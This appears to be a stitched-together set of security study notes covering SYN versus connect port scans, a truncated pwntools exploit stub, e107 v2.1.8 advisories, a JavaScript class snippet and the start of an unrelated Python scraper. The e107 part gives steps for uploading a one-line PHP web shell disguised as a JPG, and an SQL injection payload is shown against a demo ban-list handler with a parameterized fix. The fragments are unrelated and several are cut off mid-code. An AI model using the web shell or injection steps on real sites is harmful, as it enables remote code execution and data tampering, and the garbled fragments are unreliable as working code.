- SYN scan vs. TCP (connect) scan
- TCP scan
- Performs the full three-way handshake sequence
- Because a connection is actually established, the probe is likely to appear in the target's logs
- SYN scan
- Does not complete the TCP connection
- Also called a half-open scan or stealth scan
- Sends a SYN packet; if a SYN/ACK comes back, the port is treated as open (an RST is then sent instead of the final ACK, so the handshake never completes)
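The logging difference is the practical point of the note above, so here is an added example (not code from the original page) that runs a TCP connect scan against a local listener and shows why it is noisy: connect() finishes the handshake, the listener's accept() returns, and the probe shows up in whatever the service logs. The listener, the port choice and the "accept log" list are all constructed for this demo. A SYN scan sends raw packets and needs root, so it is not run here; the contrast is that it never reaches accept(), so this log would stay empty.

```python
import socket
import threading
import time


def start_listener(host="127.0.0.1"):
    """Start a constructed local TCP service on an ephemeral port.

    Every accepted connection is appended to `accepted`, standing in for the
    "connection from X" line a real daemon would write to its log.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    accepted = []
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, peer = srv.accept()
            except socket.timeout:
                continue
            accepted.append(peer)  # this is the log entry a connect scan leaves behind
            conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, accepted, stop


def connect_scan(host, ports, timeout=0.3):
    """TCP connect (full-open) scan.

    connect() only returns once the three-way handshake is complete, so the
    target's accept() fires and the probe is visible to the application.
    """
    open_ports = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            open_ports.append(port)
        except OSError:  # ECONNREFUSED, timeout, unreachable: not open
            pass
        finally:
            s.close()
    return open_ports


def closed_port(host="127.0.0.1"):
    """Grab an ephemeral port and release it so the scan has a known-closed target."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    """Scan one open and one closed local port.

    Returns (open_ports_found, accept_log, open_port, closed_port).
    """
    host = "127.0.0.1"
    open_port, accepted, stop = start_listener(host)
    dead_port = closed_port(host)
    found = connect_scan(host, [dead_port, open_port])
    deadline = time.time() + 2.0  # give the listener thread time to accept()
    while not accepted and time.time() < deadline:
        time.sleep(0.05)
    stop.set()
    return found, list(accepted), open_port, dead_port


if __name__ == "__main__":
    found, log, open_port, dead_port = demo()
    print(f"open ports: {found} (listener on {open_port}, closed control port {dead_port})")
    print(f"listener accept() log: {log}")
```

The accept log is the detection signal: an IDS or the daemon itself sees a complete connection with a source address. The same scan against the same port with SYN-only probes leaves a half-open attempt that only packet-level monitoring (or a SYN-flood style counter) can notice.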
from pwn import *
import sys

# Addresses taken from the target binary (fixed, i.e. the binary is not PIE)
username_addr = 0x6020C0
password_addr = 0x6020E0
call_printf_addr = 0x04009B6
pop_rdi = 0x0000000000400B03  # pop rdi ; ret

with open("username_payload", "wb") as f:
    pass  # payload construction is not included in this excerpt
MediaManager of e107 v2.1.8 contains a flaw that is triggered because file types and extensions of uploaded files are not properly validated before the files are placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.
- Log in to the admin page (/e107_admin/admin.php) and open MediaManager.
- Create a PHP backdoor named "backdoor.jpg" to bypass the JavaScript (client-side) filter and select it in MediaManager.
<?php system($_GET['q']) ?>
e107 v2.1.8 contains a flaw that may allow an SQL injection attack. The issue is due to the /e107_admin/banlist.php script not properly escaping input to the old_ip parameter. This may allow a remote attacker to inject or manipulate SQL queries in the database, allowing for the manipulation or disclosure of arbitrary data.
- Log in to the admin page (/e107_admin/admin.php).
- Send a POST request to /e107_admin/banlist.php and use Burp Suite to rewrite the parameters as follows.
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
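To make the old_ip issue concrete, here is an added example (Python with sqlite3, not e107's code) of an "edit ban" handler that interpolates old_ip into its UPDATE statement, beside the parameterized version. The table name, columns, rows and the exact query shape are constructed assumptions; the page only tells us that old_ip reaches SQL unescaped. The injected value turns a one-row update into an update of every row, which is the "manipulation of arbitrary data" the advisory text describes.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a ban-list table (not e107's real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE banlist (banlist_ip TEXT, banlist_reason TEXT)")
    db.executemany(
        "INSERT INTO banlist VALUES (?, ?)",
        [("10.0.0.1", "brute force"), ("10.0.0.2", "spam"), ("10.0.0.3", "scanner")],
    )
    db.commit()
    return db


def update_ban_vulnerable(db, old_ip, new_ip):
    """Handler that builds the statement by string interpolation.

    old_ip is the POST parameter; nothing escapes it, so a quote in it
    rewrites the WHERE clause. Returns the number of rows changed.
    """
    sql = f"UPDATE banlist SET banlist_ip = '{new_ip}' WHERE banlist_ip = '{old_ip}'"
    return db.execute(sql).rowcount


def update_ban_safe(db, old_ip, new_ip):
    """Same operation with bound parameters: the value can never become SQL."""
    return db.execute(
        "UPDATE banlist SET banlist_ip = ? WHERE banlist_ip = ?", (new_ip, old_ip)
    ).rowcount


def ips(db):
    """Current IP column, in insertion order."""
    return [row[0] for row in db.execute("SELECT banlist_ip FROM banlist ORDER BY rowid")]


# Constructed injection payload for old_ip: closes the string and makes the
# WHERE clause always true.
PAYLOAD = "x' OR '1'='1"


def demo():
    """Run the payload through both handlers; returns (vuln_rows, vuln_ips, safe_rows, safe_ips)."""
    db = make_db()
    vuln_rows = update_ban_vulnerable(db, PAYLOAD, "0.0.0.0")
    vuln_ips = ips(db)

    db = make_db()
    safe_rows = update_ban_safe(db, PAYLOAD, "0.0.0.0")
    safe_ips = ips(db)
    return vuln_rows, vuln_ips, safe_rows, safe_ips


if __name__ == "__main__":
    vuln_rows, vuln_ips, safe_rows, safe_ips = demo()
    print(f"vulnerable handler: {vuln_rows} rows changed -> {vuln_ips}")
    print(f"parameterized handler: {safe_rows} rows changed -> {safe_ips}")
```

The fix is the same whatever the real query looks like: pass old_ip as a bound parameter (or through the framework's prepared-statement API) rather than concatenating it, and validate that it is a well-formed IP address before it reaches the database at all.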
https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Classes
- Added in ECMAScript 6 (ES2015)
- Previously, objects with class-like behaviour were usually built with prototype; the class syntax makes the same thing much simpler to write
class Polygon {
  constructor(height, width) {
    this.height = height;
    this.width = width;
  }
}
from html.parser import HTMLParser
from urllib.request import urlopen
from datetime import datetime
import json
import csv
import sys
import re
import os

# Path of the error log
ERRORLOG = 'error.log'